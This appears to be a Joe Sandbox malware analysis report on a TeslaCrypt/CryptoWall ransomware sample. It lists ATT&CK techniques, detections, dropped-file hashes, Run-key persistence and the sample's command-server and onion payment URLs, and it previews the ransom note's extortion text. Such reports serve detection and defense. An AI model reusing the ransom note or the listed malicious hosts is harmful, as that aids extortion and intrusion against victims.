Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateRevocation\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\blob_storage\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; Directory queried: number of queries: 1023
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 4 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 5 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 5 Data Encrypted for Impact |
| Credentials | Domains | Default Accounts | 3 Command and Scripting Interpreter | 1 Browser Extensions | 1 Access Token Manipulation | 3 Obfuscated Files or Information | LSASS Memory | 1 System Network Connections Discovery | Remote Desktop Protocol | 11 Browser Session Hijacking | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | 11 Registry Run Keys / Startup Folder | 11 Process Injection | 1 Install Root Certificate | Security Account Manager | 14 File and Directory Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 1 Multi-hop Proxy | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 11 Registry Run Keys / Startup Folder | 12 Software Packing | NTDS | 24 System Information Discovery | Distributed Component Object Model | 1 Email Collection | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Query Registry | SSH | Keylogging | 4 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 File Deletion | Cached Domain Credentials | 13 Security Software Discovery | VNC | GUI Input Capture | 2 Proxy | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Masquerading | DCSync | 1 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | 2 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Access Token Manipulation | Network Sniffing | 1 Remote System Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 11 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
| Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 2 Hidden Files and Directories | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking |
[Behavior graph: Behavior Graph ID: 1586217, Sample: 0t8amSU3vd, Startdate: 08/01/2025, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 0t8amSU3vd.exe | 91% | ReversingLabs | Win32.Ransomware.TeslaCrypt | |
| 0t8amSU3vd.exe | 100% | Avira | TR/Crypt.ZPACK.123672 | |
| 0t8amSU3vd.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Roaming\svcmtr.exe | 91% | ReversingLabs | Win32.Ransomware.TeslaCrypt | |
No Antivirus matches
No Antivirus matches
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://crl.entrust.net/server1.crl0svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://oss.oracle.com/projects/gstreamer-mods/svcmtr.exe, 00000002.00000003.753072751.0000000003733000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://www.apache.org/licenses/svcmtr.exe, 00000002.00000003.753072751.0000000003733000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496Asvcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.00000000006ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            https://www.serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABDsvcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.00000000006ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            https://serenitynowbooksandgifts.com/svcmtr.exe, 00000002.00000002.875689270.00000000006AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            http://www.unicode.org/reports/svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://fgainterests.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496svcmtr.exe, 00000002.00000003.526806159.00000000006ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://meetings.clients6.google.comsvcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://zpr5huq4bgmutfnf.tor2web.org0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp, 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387316507.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.torproject.org/projects/torbrowser.html.en0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp, 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387316507.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmp, notepad.exe, 00000015.00000002.875324829.000000000017E000.00000004.00000020.00020000.00000000.sdmp, restore_files_gpmus.txt48.2.dr, restore_files_gpmus.txt112.2.dr, restore_files_gpmus.txt293.2.dr, restore_files_gpmus.txt119.2.dr, restore_files_gpmus.txt382.2.dr, restore_files_gpmus.txt411.2.dr, restore_files_gpmus.txt327.2.dr, restore_files_gpmus.txt376.2.dr, restore_files_gpmus.txt155.2.drfalse
                                                                                                                    high
                                                                                                                    http://errors.angularjs.org/1.6.4-localsvcmtr.exe, 00000002.00000003.408228286.00000000038A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://ipinfo.io/ip0t8amSU3vd.exe, svcmtr.exe, svcmtr.exe, 00000002.00000002.875689270.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.00000000006D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.ecma-international.orgsvcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD977svcmtr.exe, 00000002.00000003.762757058.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.755159581.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.767533797.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.671880034.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.766203672.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.761900567.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.772593472.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.763661219.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.660754432.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.765866382.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.764581660.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.763893449.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.771267902.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.660454927.0000000003733000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.765633512.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.762361432.0000000003750000.00000004.00000020.00020000.00000000.sdmp, 
svcmtr.exe, 00000002.00000003.770304239.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.466108647.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.773528671.0000000003750000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://teenpornotube.org/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C91884649svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://www.unicode.org/copyright.html.svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://secure.comodo.com/CPS0svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://ledshoppen.nl/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD9svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://upx.tsx.orgsvcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs
                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          IP
                                                                                                                          192.168.2.13
                                                                                                                          192.168.2.23
                                                                                                                          192.168.2.15
                                                                                                                          192.168.2.14
                                                                                                                          192.168.2.255
                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                          Analysis ID:1586217
                                                                                                                          Start date and time:2025-01-08 21:08:42 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 9m 11s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                          Number of analysed new started processes analysed:22
                                                                                                                          Number of new started drivers analysed:2
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:0t8amSU3vd.exe
                                                                                                                          (renamed file extension from none to exe, renamed because original name is a hash value)
                                                                                                                          Original Sample Name:ad340c9ea5510d1f0f6149fae0bd5349d6e8b01df4eccc9a2bb300be4bc9d981
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.rans.phis.troj.spyw.evad.winEXE@26/1205@15/13
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 97%
                                                                                                                          • Number of executed functions: 227
                                                                                                                          • Number of non-executed functions: 137
                                                                                                                          Cookbook Comments:
                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, vga.dll, conhost.exe, VSSVC.exe, svchost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 216.58.215.227, 172.217.168.14, 173.194.79.84, 142.250.203.99, 34.104.35.123
                                                                                                                          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, edgedl.me.gvt1.com, update.googleapis.com, clientservices.googleapis.com, clients.l.google.com
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                          • VT rate limit hit for: 0t8amSU3vd.exe
                                                                                                                          Time      Type             Description
                                                                                                                          12:09:33  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run E722D94C1CAC34B C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          12:09:42  Autostart        Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run E722D94C1CAC34B C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          12:09:51  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run E722D94C1CAC34B C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          12:10:51  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.html
                                                                                                                          12:10:59  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.txt
                                                                                                                          15:09:31  API Interceptor  75513x Sleep call for process: svcmtr.exe modified
                                                                                                                          15:09:31  API Interceptor  3x Sleep call for process: 0t8amSU3vd.exe modified
                                                                                                                          15:09:35  API Interceptor  12x Sleep call for process: vssadmin.exe modified
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:true
                                                                                                                          Reputation:low
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Reputation:low
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:true
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6382
                                                                                                                          Entropy (8bit):7.953972400342168
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GovLnUcws4sQ6en3CI1tMbOMGTa6Hp4JlD5y:GIArsQ6en4L6J4JLy
                                                                                                                          MD5:456A66D829191A53BD1BEC55D81A9F13
                                                                                                                          SHA1:65EE4ABE7E0A5C7C1B65E133FE00C3B4880DAAF3
                                                                                                                          SHA-256:DCDA40FA7D4B242D82A4B18DA79B3E1B65536C6E812A3287AA64E56CF258456C
                                                                                                                          SHA-512:C02DFF14077B86EAF9208BC780C70DFF09EA5C7E2489558DC429EF688AED5D48707ECE4CD8F6C2D5AC866F44004AC0EC6DD6F8B83E811177F459BDF330D7B923
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):430
                                                                                                                          Entropy (8bit):5.913381561430947
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS2TkIdn:c+z5U4a8OoDUX+S2TkIdn
                                                                                                                          MD5:9559B4B0A7E9B54F1E77FDDFF1BA4D3C
                                                                                                                          SHA1:AD0C9C5A7AFB954840386E2600C61087CA1FE854
                                                                                                                          SHA-256:FFC25C9C9000BBC75F3E0551D09FC70DFBE7C10D6EA6832420CD10C8A5D4C198
                                                                                                                          SHA-512:3D18EF1764A5FDD452222ED35DA3830FA9ED2C869AF3AA0193EE39A2B9AA44723F71FC66E69A4961433C6EBC02C5FCCE4A8CAB3A5A4F1EC6130AEB07814254E7
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1918
                                                                                                                          Entropy (8bit):7.770366939156214
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgLUDX1N54dE5TWJwiA+P17YuqYq/4jL1uKnLulxetx:cztoDAUDZ5oJV7tq9cLcKLjx
                                                                                                                          MD5:8798046759AB3AF89ED26DD4348AF901
                                                                                                                          SHA1:A2C4073B0DDE315F11F93A9817B728B66665336E
                                                                                                                          SHA-256:F9AEAF521CD1C6C989DECB96ABF12487846683BBE367AD8F4806E090F49D4C14
